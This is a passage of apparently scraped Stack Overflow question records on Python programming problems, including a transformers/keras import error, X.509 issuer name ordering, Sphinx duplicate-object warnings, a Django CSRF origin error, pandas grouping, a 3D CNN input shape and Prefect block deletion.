File "<frozen importlib._bootstrap>", line 1206, in _gcd_import
File "<frozen importlib._bootstrap>", line 1178, in _find_and_load
File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 690, in _load_unlocked
File "<frozen importlib._bootstrap_external>", line 940, in exec_module
File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
File "/opt/homebrew/lib/python3.11/site-packages/transformers/models/bert/modeling_tf_bert.py", line 38, in <module>
from ...modeling_tf_utils import (
File "/opt/homebrew/lib/python3.11/site-packages/transformers/modeling_tf_utils.py", line 70, in <module>
from keras.engine import data_adapter
ModuleNotFoundError: No module named 'keras.engine'
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/Users/pedrospecter/Downloads/work/cw1/autonomous_ai/main.py", line 9, in <module>
from transformers import BertTokenizer, TFBertForSequenceClassification
File "<frozen importlib._bootstrap>", line 1231, in _handle_fromlist
File "/opt/homebrew/lib/python3.11/site-packages/transformers/utils/import_utils.py", line 1067, in __getattr__
value = getattr(module, name)
^^^^^^^^^^^^^^^^^^^^^
File "/opt/homebrew/lib/python3.11/site-packages/transformers/utils/import_utils.py", line 1066, in __getattr__
module = self._get_module(self._class_to_module[name])
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/homebrew/lib/python3.11/site-packages/transformers/utils/import_utils.py", line 1078, in _get_module
raise RuntimeError(
RuntimeError: Failed to import transformers.models.bert.modeling_tf_bert because of the following error (look up to see its traceback):
No module named 'keras.engine'
</code></pre>
<p>I have installed both transformers and tensorflow using:</p>
<pre><code>pip3 install transformers tensorflow
</code></pre>
<p>I am on a MacBook Pro M2 Max</p>
<p>Does anyone have a tip on how I can run this? The code above is just the essential part up to where the error appears; there is much more code below it.</p>
<p>Cheers</p>
|
<python><tensorflow><huggingface-transformers>
|
2023-05-21 13:46:32
| 1
| 433
|
thelittlemaster
|
76,300,143
| 17,835,656
|
Why is the issuer name reversed when I get it using Python?
|
<p>I have a certificate, and when I use Python to get its issuer name, the name comes back reversed:</p>
<p>the correct issuer name : <code>CN=PEZEINVOICESCA2-CA,DC=extgazt,DC=gov,DC=local</code></p>
<p>the issuer name that i get : <code>DC=local,DC=gov,DC=extgazt,CN=PEZEINVOICESCA2-CA</code></p>
<p>This is the code I use to get the issuer name:</p>
<pre class="lang-py prettyprint-override"><code>import cryptography.x509
your_Certificate = open("cert.txt","rb")
Certificate = your_Certificate.read().decode()
your_Certificate.close()
the_certificate = cryptography.x509.load_pem_x509_certificate("-----BEGIN CERTIFICATE-----\n{}\n-----END CERTIFICATE-----".format(Certificate).encode())
issuer_name = (str(the_certificate.issuer).split("(")[-1].split(")")[0])
print(issuer_name)
</code></pre>
<p>And this is the website from which I get the correct issuer name: <code>https://certlogik.com/</code></p>
<p>This is my certificate:</p>
<blockquote>
<p>MIIFGTCCBMCgAwIBAgITbQAABwotIOM7hEGkOwAAAAAHCjAKBggqhkjOPQQDAjBiMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgNnb3YxFzAVBgoJkiaJk/IsZAEZFgdleHRnYXp0MRswGQYDVQQDExJQRVpFSU5WT0lDRVNDQTItQ0EwHhcNMjMwNTIxMDkxMjE3WhcNMjMwODA4MTIyNjQ2WjBZMQswCQYDVQQGEwJTQTEhMB8GA1UEChMYTW9oYW1tZWQgYWxtYWxraSBjb21wYW55MREwDwYDVQQLEwhtb2hhbW1lZDEUMBIGA1UEAxMLZGV2aWNlIG11c2EwVjAQBgcqhkjOPQIBBgUrgQQACgNCAAStYLyBf9nWo3vWtzUkM2itMt/8euVz4Kao8fqz8SqUKl46RzqyhUUjR4gij3HvA6gBbHT1ai2O5JaAeaj1/4G3o4IDXzCCA1swJwYJKwYBBAGCNxUKBBowGDAKBggrBgEFBQcDAjAKBggrBgEFBQcDAzA8BgkrBgEEAYI3FQcELzAtBiUrBgEEAYI3FQiBhqgdhND7EobtnSSHzvsZ08BVZoGc2C2D5cVdAgFkAgETMIHNBggrBgEFBQcBAQSBwDCBvTCBugYIKwYBBQUHMAKGga1sZGFwOi8vL0NOPVBFWkVJTlZPSUNFU0NBMi1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1leHRnYXp0LERDPWdvdixEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAdBgNVHQ4EFgQUDQdY1rouelOIOWWyJ8ByNGfyKeQwDgYDVR0PAQH/BAQDAgeAMIHOBgNVHREEgcYwgcOkgcAwgb0xVTBTBgNVBAQMTDEta2FyYWZldGFfcHJncmFtfDItdGhlX2RldmljZV9uYW1lX2lzX2RldmljZSBtdXNhfDMtdGhlX2RldmljZV9udW1iZXJfaXNfNTAxHzAdBgoJkiaJk/IsZAEBDA8zMTExOTAyOTM3MDAwMDMxDTALBgNVBAwMBDExMDAxDjAMBgNVBBoMBWphemFuMSQwIgYDVQQPDBt0ZWNobm9sb2d5IGFuZCBjb25zdWx0YXRpb24wgeEGA1UdHwSB2TCB1jCB06CB0KCBzYaBymxkYXA6Ly8vQ049UEVaRUlOVk9JQ0VTQ0EyLUNBLENOPVBFWkVpbnZvaWNlc2NhMixDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1leHRnYXp0LERDPWdvdixEQz1sb2NhbD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwHwYDVR0jBBgwFoAUh6XbAr13zUdvaQF7eC0a9e7HwFEwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMDMAoGCCqGSM49BAMCA0cAMEQCIHu3KKPhtrWF86EyD1p5GZ0fDzrRIrAVQpO0S4HYZEyfAiArNL/YVPyE+QdNH5AF4CGqIA+wpBYe9vVngMdGlvOwJA==</p>
</blockquote>
<p>I know I can reverse it myself, but I want it to come out correctly from Python itself.</p>
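<p>Depending on your version of the cryptography library, <code>the_certificate.issuer.rfc4514_string()</code> may already give you the RDNs in the order you want (RFC 4514 lists them most-specific first, i.e. starting with the CN). If you would rather post-process the string you already have, a minimal stdlib sketch that reverses the comma-separated RDNs looks like this (note it does not handle values containing escaped commas):</p>

```python
def reverse_dn(dn: str) -> str:
    """Reverse the order of RDNs in a comma-separated DN string.

    Caveat: a naive split breaks on RDN values that contain escaped commas.
    """
    return ",".join(reversed(dn.split(",")))

reverse_dn("DC=local,DC=gov,DC=extgazt,CN=PEZEINVOICESCA2-CA")
# -> "CN=PEZEINVOICESCA2-CA,DC=extgazt,DC=gov,DC=local"
```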
|
<python><cryptography><ssl-certificate><certificate><x509certificate>
|
2023-05-21 13:28:07
| 1
| 721
|
Mohammed almalki
|
76,300,038
| 5,838,180
|
In python how to cross match sources with a given mask?
|
<p>I have a dataframe that is a catalogue of astronomical sources (galaxies) spread across most of the sky. I also have a <code>.fits</code> binary mask that covers only some parts of the sky (see below). I want to cross-match the catalogue with the mask to get only the galaxies that fall within the mask. How can I do this, e.g. with healpy?</p>
<p><a href="https://i.sstatic.net/686Ys.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/686Ys.png" alt="enter image description here" /></a></p>
|
<python><pandas><astropy><healpy><cross-match>
|
2023-05-21 13:04:40
| 1
| 2,072
|
NeStack
|
76,299,972
| 12,096,670
|
Accessing a variable of one method inside another method in the same class - Python
|
<p>Let's say I have class, MandM, as indicated below with different methods. I want all the variables in each method to be accessible to all other methods in the class because I may need them in other methods.</p>
<p>So what I am doing is like in the example below, where I call a method within another method and then access the variables I want from that method. For each method, I return its output as a dictionary and then I can refer to that variable by name in another method.</p>
<p>My question is, is there another more efficient way to go about this?</p>
<pre><code>class MandM:
def __init__(self, data, X=2, y=2):
self.data = data
self.X = X
self.y = y
def _ols(self):
y = self.data.iloc[:, :y]
X = self.data.iloc[:, X:]
B = pd.DataFrame(inv(np.dot(X.T, X)) @ np.dot(X.T, y))
B.columns = list(y.columns)
B.index = list(X.columns)
yhat = X @ B
return {"B": B, "yhat": yhat, "y": y, "X": X}
def _sscp(self):
# call ols method
        ols = self._ols()  # reuse this instance instead of constructing a new MandM
ybar = pd.DataFrame([ols["y"].mean()] * ols["y"].shape[0])
y_ybar = ols["y"] - ybar
sscp_tot = pd.DataFrame(np.dot(y_ybar.T, y_ybar))
sscp_tot.columns = list(ols["y"].columns)
sscp_tot.index = list(ols["y"].columns)
yhat_ybar = ols["yhat"] - ybar
sscp_reg = pd.DataFrame(np.dot(yhat_ybar.T, yhat_ybar))
sscp_reg.columns = list(ols["y"].columns)
sscp_reg.index = list(ols["y"].columns)
resid = ols["y"] - ols["X"] @ ols["B"]
y_yhat = ols["y"] - ols["yhat"]
sscp_resid = pd.DataFrame(np.dot(y_yhat.T, y_yhat))
sscp_resid.columns = list(ols["y"].columns)
sscp_resid.index = list(ols["y"].columns)
return {"sscp_tot": sscp_tot, "sscp_reg": sscp_reg,
"resid": resid, "sscp_resid": sscp_resid}
</code></pre>
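<p>One common alternative to passing dictionaries around is to cache each method's result on the instance, e.g. with <code>functools.cached_property</code>, so every other method can read it as an attribute without recomputing. A minimal sketch of the pattern (the names and computations here are illustrative stand-ins, not the real OLS/SSCP math):</p>

```python
from functools import cached_property

class Model:
    """Sketch: share intermediate results between methods via caching."""

    def __init__(self, data):
        self.data = data

    @cached_property
    def _ols(self):
        # Computed once on first access, then cached on the instance
        return {"total": sum(self.data)}

    def _sscp(self):
        # self._ols is now just an attribute access, not a recomputation
        return self._ols["total"] * 2

m = Model([1, 2, 3])
m._sscp()  # -> 12
```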
|
<python><class><methods>
|
2023-05-21 12:46:13
| 1
| 845
|
GSA
|
76,299,903
| 2,469,105
|
Using Python Sphinx getting WARNING: duplicate object description of myproject / use :noindex: for one of them
|
<p>I'm using Sphinx to create HTML documentation for a Python project.</p>
<p>TL;DR I cannot get rid of this warning message.</p>
<pre><code>WARNING: duplicate object description of myproject, other instance in class-stubs/Bar, use :noindex: for one of them
</code></pre>
<p>I want the index page to look like this:</p>
<p><a href="https://i.imgur.com/5rczGzQ.png" rel="nofollow noreferrer">Index page</a></p>
<p>with a separate link for each class in the project.</p>
<p>What I have actually works and gives me the result I want, but I cannot get rid of the warning messages.
None of the existing pages I've seen about the "duplicate object description" give me a solution.</p>
<p>All the Python code is in one file <code>myproject.py</code>. There is a separate RST file for each of the three classes in the subdirectory class-stubs.</p>
<pre><code>C:\...\DOCTEST
| CHANGELOG.rst
| conf.py
| index.rst
| make.bat
| Makefile
| myproject.py
| README.rst
| setup.py
|
+---class-stubs
Bar.rst
Baz.rst
Foo.rst
</code></pre>
<p>The Python code in <code>myproject.py</code> is:</p>
<pre><code>"""My Super Python Utility"""
__version__ = "1.2.3.0000"
__all__ = (
'Foo', 'Bar', 'Baz'
)
class Foo:
"""Foo utilities."""
@staticmethod
def spam(filename):
"""Perform the spam operation.
# -[cut]-
"""
return "spam, spam, spam"
class Bar:
"""Bar utilities."""
# -[cut]-
class Baz:
"""Baz utilities."""
# -[cut]-
</code></pre>
<p>We use Google style docstrings and the <code>sphinx.ext.napoleon</code> extension.</p>
<p>index.rst is as follows:</p>
<pre><code>.. My Super Python Project documentation master file
My Super Python Documentation
========================================
Contents:
.. toctree::
:maxdepth: 1
class-stubs/Foo.rst
class-stubs/Bar.rst
class-stubs/Baz.rst
README.rst
CHANGELOG.rst
Indices and tables
==================
* :ref:`genindex`
* :ref:`search`
</code></pre>
<p>Each class file in class-stubs is of the form similar to <code>Foo.rst</code></p>
<pre><code>Foo class
==========
.. automodule:: myproject
:members: Foo
</code></pre>
<p>The files <code>Bar.rst</code> and <code>Baz.rst</code> are similar.</p>
<p>On compiling with <code>make html</code> we get these errors:</p>
<pre><code>Running Sphinx v5.3.0
...
C:\...\doctest\myproject.py:docstring of myproject:1: WARNING: duplicate object description of myproject, other instance in class-stubs/Bar, use :noindex: for one of them
C:\...\doctest\myproject.py:docstring of myproject:1: WARNING: duplicate object description of myproject, other instance in class-stubs/Baz, use :noindex: for one of them
</code></pre>
<p>It looks like it is objecting to the <code>.. automodule:: myproject</code> statement in all but the first of the class RST files.</p>
<p>You can remove the warnings by adding <code>:noindex:</code> for each class RST file like this</p>
<pre><code>Foo class
==========
.. automodule:: myproject
:members: Foo
:noindex:
</code></pre>
<p>but this removes the URL links to the methods in the class, which is not what I want.</p>
<p>Can anyone suggest a solution? (NOTE: all the classes are deliberately in the one source code module, so please do not suggest separating them.) I should emphasise that this actually works, I just want to get rid of those warning messages.</p>
<p>UPDATE: of course you get rid of those messages by adding to <code>conf.py</code></p>
<pre><code>suppress_warnings = 'autosectionlabel.*'
</code></pre>
<p>but that doesn't solve the underlying problem.</p>
<p>UPDATE: following @mzjn's suggestion, I changed automodule to autoclass in each of the stub files like this:</p>
<pre><code>Bar class
============
.. autoclass:: myproject
:members: Bar
</code></pre>
<p>This gives a warning:</p>
<pre><code>WARNING: don't know which module to import for autodocumenting
'myproject' (try placing a "module" or "currentmodule" directive in
the document, or giving an explicit module name)
</code></pre>
<p>and the page for each class just has the title but no content.</p>
<p>If I set just one of the classes to have automodule (eg Bar.rst) and the other two with autoclass, then there is no warning and the Bar page is correct BUT the other class pages have no content.</p>
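<p>For what it's worth, <code>autoclass</code> normally takes the full dotted path to the class (module plus class name) rather than a bare module name with a <code>:members:</code> filter. A sketch of what each stub could look like instead, assuming autodoc can import <code>myproject</code> (this way the module object itself is not documented three times, which is what triggers the duplicate-description warning):</p>

```
Bar class
=========

.. autoclass:: myproject.Bar
   :members:
```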
|
<python><python-sphinx><autodoc>
|
2023-05-21 12:26:55
| 2
| 951
|
David I
|
76,299,315
| 11,801,298
|
Set place of each bar in matplotlib
|
<p>This is working code. It creates bars of specific length.</p>
<pre><code># creating the dataset
data = {'C':20, 'C++':15, 'Java':30,
'Python':35}
courses = list(data.keys())
values = list(data.values())
fig = plt.figure(figsize = (10, 5))
# creating the bar plot
plt.bar(courses, values, color ='maroon',
width = 0.4)
plt.xlabel("Courses offered")
plt.ylabel("No. of students enrolled")
plt.title("Students enrolled in different courses")
plt.show()
</code></pre>
<p><a href="https://i.sstatic.net/ey2IG.jpg" rel="nofollow noreferrer"><img src="https://i.sstatic.net/ey2IG.jpg" alt="enter image description here" /></a></p>
<p>But I need more control. In the future I will animate these bars, moving them left and right, so I want to set each bar's position on the x axis myself. How can I do that?</p>
<p>My desired result looks like this (when I set place by my own)</p>
<p><a href="https://i.sstatic.net/edbWC.jpg" rel="nofollow noreferrer"><img src="https://i.sstatic.net/edbWC.jpg" alt="enter image description here" /></a></p>
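<p><code>plt.bar</code> accepts explicit numeric x positions as its first argument, so each bar can be placed wherever you like, with <code>plt.xticks</code> keeping the course names as labels. A minimal sketch (the positions here are arbitrary examples):</p>

```python
import matplotlib
matplotlib.use("Agg")  # headless backend so this runs without a display
import matplotlib.pyplot as plt

data = {'C': 20, 'C++': 15, 'Java': 30, 'Python': 35}
positions = [0.0, 1.0, 3.5, 5.0]  # arbitrary x position for each bar
bars = plt.bar(positions, list(data.values()), color='maroon', width=0.4)
plt.xticks(positions, list(data.keys()))  # label the chosen positions
```

<p>For the animation later, the returned <code>Rectangle</code> objects can be moved individually with <code>bars[i].set_x(new_x)</code>.</p>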
|
<python><matplotlib>
|
2023-05-21 10:02:48
| 2
| 877
|
Igor K.
|
76,299,098
| 14,950,385
|
Is it possible to implement a provider method on top of python?
|
<p>I'm trying to control my laptop fan speed using WMI in python.</p>
<p>This is my python code:</p>
<pre class="lang-py prettyprint-override"><code>import wmi
c = wmi.WMI ()
cim_fan = c.CIM_Fan()
fan_speed = 4000
cim_fan[0].SetSpeed(fan_speed)
</code></pre>
<p>But it throws this error:</p>
<pre><code>Traceback (most recent call last):
File "C:\Users\AliEnt\Desktop\Athena Codes\control_fan\main.py", line 7, in <module>
cim_fan[0].SetSpeed(fan_speed)
File "C:\Users\AliEnt\AppData\Roaming\Python\Python39\site-packages\wmi.py", line 473, in __call__
handle_com_error()
File "C:\Users\AliEnt\AppData\Roaming\Python\Python39\site-packages\wmi.py", line 258, in handle_com_error
raise klass(com_error=err)
wmi.x_wmi: <x_wmi: Unexpected COM Error (-2147352567, 'Exception occurred.', (0, 'SWbemObjectEx', 'This method is not implemented in any class ', None, 0, -2147217323), None)>
</code></pre>
<p>Then I took a closer look at the <a href="https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/cim-fan#methods" rel="nofollow noreferrer">CIM_Fan class documentation</a> and saw this:</p>
<div class="s-table-container">
<table class="s-table">
<thead>
<tr>
<th>Method</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Reset</td>
<td>Requests a reset of the logical device. <strong>Not implemented by WMI</strong>.</td>
</tr>
<tr>
<td>SetPowerState</td>
<td>Defines the desired power state for a logical device and when a device should be put into that state. <strong>Not implemented by WMI</strong>.</td>
</tr>
<tr>
<td>SetSpeed</td>
<td>Sets the fan speed. <strong>Not implemented by WMI</strong>.</td>
</tr>
</tbody>
</table>
</div>
<p><a href="https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/setspeed-method-in-class-cim-fan#remarks" rel="nofollow noreferrer">Here</a> it says that I have to implement the method in my own provider. I don't understand what is meant by <em>provider</em>.</p>
<p>I'm familiar with C++, but I'm pretty new to Microsoft APIs, so I'd prefer to do this in Python instead of compiling a C++ program, or at least with minimal C++ code and a wrapper.</p>
|
<python><winapi><wmi><cim>
|
2023-05-21 09:08:10
| 0
| 2,695
|
Ali Ent
|
76,298,985
| 12,285,101
|
Reduce pandas data frame to have one column with list of repeating values
|
<p>I have the following dataframe:</p>
<pre><code>index name path
0 Dina "gs://my_bucket/folder1/img1.png"
1 Dina "gs://my_bucket/folder1/img2.png"
2 Lane "gs://my_bucket/folder1/img3.png"
3 Bari "gs://my_bucket/folder1/img4.png"
4 Andrew "gs://my_bucket/folder1/img5.png"
5 Andrew "gs://my_bucket/folder1/img6.png"
6 Andrew "gs://my_bucket/folder1/img7.png"
7 Beti "gs://my_bucket/folder1/img7.png"
8 Ladin "gs://my_bucket/folder1/img5.png"
...
</code></pre>
<p>I would like to get a new dataframe in which each unique name appears only once and the path column holds a list of the matching paths. The output should look like this:</p>
<pre><code>index name path
0 Dina ["gs://my_bucket/folder1/img1.png","gs://my_bucket/folder1/img2.png"]
1 Lane ["gs://my_bucket/folder1/img3.png"]
2 Bari ["gs://my_bucket/folder1/img4.png"]
3 Andrew ["gs://my_bucket/folder1/img5.png","gs://my_bucket/folder1/img6.png","gs://my_bucket/folder1/img7.png"]
4 Beti ["gs://my_bucket/folder1/img7.png"]
5 Ladin ["gs://my_bucket/folder1/img5.png"]
...
</code></pre>
<p>The result should have a number of rows equal to the number of unique names in the dataframe.
At the moment I'm using something I made with ChatGPT, but it uses a function whose purpose I don't understand, and it also duplicates names: when I know I should have 842 unique names, I get 992 ...</p>
<p>This is the ChatGPT solution:</p>
<pre><code># Define a custom aggregation function to combine links as a list
def combine_links(links):
return list(set(links)) # Convert links to a list and remove duplicates
# Group the GeoDataFrame by 'name' and 'dili' and aggregate the 'link' column
result = df.groupby(['name'))['path'].agg(combine_links).reset_index()
</code></pre>
<p>My goal is to find a solution that, in the end, gives me the right number of rows: the number of unique names.</p>
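<p>For reference, the grouping the question describes needs no custom function — <code>groupby(...).agg(list)</code> is enough — and when the result has more rows than expected unique names, the usual culprit is near-duplicate names (stray whitespace or case differences), which can be normalized first. A sketch with toy paths:</p>

```python
import pandas as pd

df = pd.DataFrame({
    "name": ["Dina", "Dina", "Lane", "Bari"],
    "path": ["img1.png", "img2.png", "img3.png", "img4.png"],
})

# Optional: normalize names so "Dina " and "Dina" do not become two groups
df["name"] = df["name"].str.strip()

# sort=False keeps first-appearance order; one row per unique name
result = df.groupby("name", sort=False)["path"].agg(list).reset_index()
```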
|
<python><pandas><aggregate>
|
2023-05-21 08:37:50
| 2
| 1,592
|
Reut
|
76,298,900
| 3,646,265
|
Django CORS issue with VUE
|
<p>I am running python 3.11.3 with the following packages:</p>
<pre><code>Package Version
------------------- -------
asgiref 3.6.0
Django 4.2.1
django-cors-headers 4.0.0
pip 23.1.2
setuptools 67.6.1
sqlparse 0.4.4
whitenoise 6.4.0
</code></pre>
<p>I am trying to enable <strong>CORS</strong> for <strong>Vue</strong>, but I keep running into the following error:</p>
<pre><code>Forbidden (Origin checking failed - http://127.0.0.1:8090 does not match any
trusted origins.): /api/login/
</code></pre>
<p>In settings.py, I have:</p>
<pre><code>CORS_ALLOW_ALL_ORIGINS = True
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'reports',
'corsheaders',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
</code></pre>
<p>Browser response header</p>
<pre><code>access-control-allow-origin: http://127.0.0.1:8090
Content-Length: 2569
Content-Type: text/html; charset=utf-8
Cross-Origin-Opener-Policy: same-origin
Date: Sun, 21 May 2023 08:13:21 GMT
Referrer-Policy: same-origin
Server: WSGIServer/0.2 CPython/3.11.3
Vary: origin
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
</code></pre>
<p>Request header</p>
<pre><code>Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,es;q=0.8
Connection: keep-alive
Content-Length: 40
Content-Type: application/json
DNT: 1
Host: 127.0.0.1:8000
Origin: http://127.0.0.1:8090
Referer: http://127.0.0.1:8090/
sec-ch-ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
</code></pre>
<p>Do you have any idea what I am doing wrong? Any help would be appreciated.</p>
<p>Thanks,</p>
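<p>Note that the quoted error ("Origin checking failed ... does not match any trusted origins") comes from Django's CSRF origin check, not from CORS, so the corsheaders settings alone will not silence it. In Django 4+, a cross-origin POST needs its origin listed in <code>CSRF_TRUSTED_ORIGINS</code> — a sketch, assuming the Vue dev server runs on 127.0.0.1:8090:</p>

```python
# settings.py — tell Django's CSRF middleware to trust the Vue dev server's origin
CSRF_TRUSTED_ORIGINS = ["http://127.0.0.1:8090"]
```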
|
<python><django><vue.js><cors>
|
2023-05-21 08:12:57
| 0
| 383
|
developthou
|
76,298,596
| 2,000,548
|
How to delete Prefect blocks in Python?
|
<p>I am using Prefect 2.</p>
<p>I am able to create Prefect blocks, for example, AWS Credentials and Kubernetes Job blocks by</p>
<pre class="lang-py prettyprint-override"><code>from prefect_aws import AwsCredentials
from prefect.infrastructure import KubernetesJob
async def create():
await AwsCredentials(
aws_access_key_id="xxx",
aws_secret_access_key="xxx",
region_name="us-west-2",
).save(f"my-aws-credentials-block", overwrite=True)
await KubernetesJob(
image=f"my-image:latest",
image_pull_policy="Always",
).save(f"my-kubernetes-job-block", overwrite=True)
</code></pre>
<p>Now I am hoping to delete them in Python.</p>
<p>I was trying to find how to at</p>
<ul>
<li><a href="https://prefecthq.github.io/prefect-kubernetes/" rel="nofollow noreferrer">https://prefecthq.github.io/prefect-kubernetes/</a></li>
<li><a href="https://prefecthq.github.io/prefect-aws/" rel="nofollow noreferrer">https://prefecthq.github.io/prefect-aws/</a></li>
</ul>
<p>but didn't find any info.</p>
<p>Is there a way to delete Prefect blocks by Python code? Thanks!</p>
|
<python><prefect>
|
2023-05-21 06:34:12
| 2
| 50,638
|
Hongbo Miao
|
76,298,402
| 7,987,987
|
how to get league id for players based on data in matches column
|
<p>I have 2 dataframes for soccer info:</p>
<ul>
<li><code>matches</code>: info on individual matches. Contains columns for the ID of the league in which the match was played, the date the match was played, the season the match was played, and has 22 columns of player IDs (<code>home_player_1</code>, <code>home_player_2</code>, ... <code>home_player_11</code>, <code>away_player_1</code>, <code>away_player_2</code>, ... <code>away_player11</code>) for each of the players that started the match.</li>
<li><code>player_attributes</code>: info on the attributes of individual players recorded over time. Each player has multiple recordings each season for many seasons, so each row has a <code>date</code> column that indicates when the data in that row was recorded. This is important because it means the player ID column is not a unique index.</li>
</ul>
<p>I want to add a <code>league_id</code> column to the player attributes dataframe so that I know which league the player was in at the time the specific attributes in that row were recorded.</p>
<p>What I've done so far:</p>
<ul>
<li>added a <code>season</code> column to the player attributes df based on the value in the <code>date</code> column for each row</li>
<li>created a new <code>player_matches</code> df with columns <code>match_id</code>, <code>player_id</code>, <code>season</code>, <code>league_id</code>. Each match id in this df shows up in 22 rows (one for the id of each player that started the match).</li>
</ul>
<p>My goal with this <code>player_matches</code> df is to use it to find the league id for each row in the player attributes table by matching the player id and season to a <code>player_matches</code> row and then using the value of league id for that row. The problem is that I haven't found an efficient way to do this. The player attributes df contains 121k rows and the player matches table contains 321k rows so normal easy indexing/masking/merging doesn't work. I tried using <code>apply</code> like this:</p>
<pre class="lang-py prettyprint-override"><code>def get_league_id(row):
player_api_id = row['player_api_id']
season = row['season']
match_row = player_matches[(player_matches['player_api_id'] == player_api_id) & (player_matches['season'] == season)].iloc[0]
league_id = match_row['league_id']
return league_id
player_attributes.apply(get_league_id, axis=1)
</code></pre>
<p>However, this gives the error: "IndexError: single positional indexer is out-of-bounds". I noticed that the error doesn't happen until the 13th row, so basically this code <code>player_attributes.head(12).apply(get_league_id, axis=1)</code> works.</p>
<p>Any idea why this error is occurring? Or do you have an alternate method that will work?</p>
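<p>The IndexError in the apply approach happens whenever a (player, season) pair has no match in <code>player_matches</code> — <code>.iloc[0]</code> is then taken on an empty selection. A left merge on the two key columns vectorizes the lookup instead, leaving NaN where there is no match. A sketch with toy IDs:</p>

```python
import pandas as pd

player_attributes = pd.DataFrame({
    "player_api_id": [1, 1, 2],
    "season": ["2015/2016", "2016/2017", "2015/2016"],
})
player_matches = pd.DataFrame({
    "player_api_id": [1, 1, 1, 2],
    "season": ["2015/2016", "2015/2016", "2016/2017", "2014/2015"],
    "league_id": [10, 10, 20, 30],
})

# One (player, season, league) row per combination, then a vectorized lookup
lookup = player_matches[["player_api_id", "season", "league_id"]].drop_duplicates()
result = player_attributes.merge(lookup, on=["player_api_id", "season"], how="left")
```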
|
<python><pandas><dataframe>
|
2023-05-21 05:22:25
| 1
| 936
|
Uche Ozoemena
|
76,298,170
| 8,616,751
|
Shape of predictors for geospatial 3D CNN
|
<p>I can't get my mind around how to build a 3D CNN in python to account for spatial features. I have one target variable (binary classification) and say three predictor variables (continuous). All variables have 35 timesteps, 137 latitudes and 181 longitudes. I made a dummy script</p>
<pre><code>import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv3D, MaxPooling3D, Flatten, Dense
### Generate dummy variables
np.random.seed(42)
predictors = np.random.rand(35, 137, 181, 3)
target = np.random.rand(35, 137, 181)
model = Sequential()
model.add(Conv3D(32,
kernel_size=(3, 3, 3),
activation='relu',
input_shape=(35, 181, 137, 3)))
model.add(MaxPooling3D(pool_size=(2, 2, 2)))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dense(1))
model.compile(optimizer='adam', loss='mean_squared_error')
model.fit(predictors,
target,
epochs=10,
batch_size=32,
validation_split=0.2)
</code></pre>
<p>but when I try to fit my model, I get the error</p>
<pre><code>ValueError: Input 0 of layer "sequential" is incompatible with the layer: expected shape=(None, 35, 181, 137, 3), found shape=(None, 181, 137, 3)
</code></pre>
<p>Why is this happening? I know this is a noob question, but if someone could help me solve it and explain what is going on, that would be great! Eventually the model should be able to predict along the time axis, i.e. based on the 3 predictor variables.</p>
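<p>Conv3D expects 5-D batches of shape (batch, dim1, dim2, dim3, channels), but Keras treats the first axis of whatever is passed to <code>fit</code> as the batch axis, so the (35, 137, 181, 3) array is seen as 35 samples of 4-D data. If the 35 timesteps are meant to be the depth axis of a single sample, a batch axis has to be added — and the spatial axes reordered to match <code>input_shape</code>. A numpy-only sketch of that reshaping (the target would need similar treatment):</p>

```python
import numpy as np

predictors = np.random.rand(35, 137, 181, 3)

# Treat the whole cube as ONE sample: add a leading batch axis ...
batched = predictors[np.newaxis, ...]        # (1, 35, 137, 181, 3)
# ... and swap lat/lon to match the (35, 181, 137, 3) order in input_shape
batched = batched.transpose(0, 1, 3, 2, 4)   # (1, 35, 181, 137, 3)
```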
|
<python><keras><conv-neural-network>
|
2023-05-21 03:26:11
| 1
| 303
|
scriptgirl_3000
|
76,298,101
| 19,270,168
|
Cannot create a client socket with a PROTOCOL_TLS_SERVER context while trying to rank a player in-group
|
<pre class="lang-py prettyprint-override"><code>import robloxapi
async def grouprank(userId, rankName):
# omitted rank-name to role id mapping
rankId = dic[rankName]
client = robloxapi.Client(cookie=NOT_STUPID_ENOUGH_TO_DISCLOSE)
grp = await client.get_group(32409863)
await robloxapi.client.Group.set_rank_by_id(grp, userId, rankId)
import asyncio
lp = asyncio.new_event_loop()
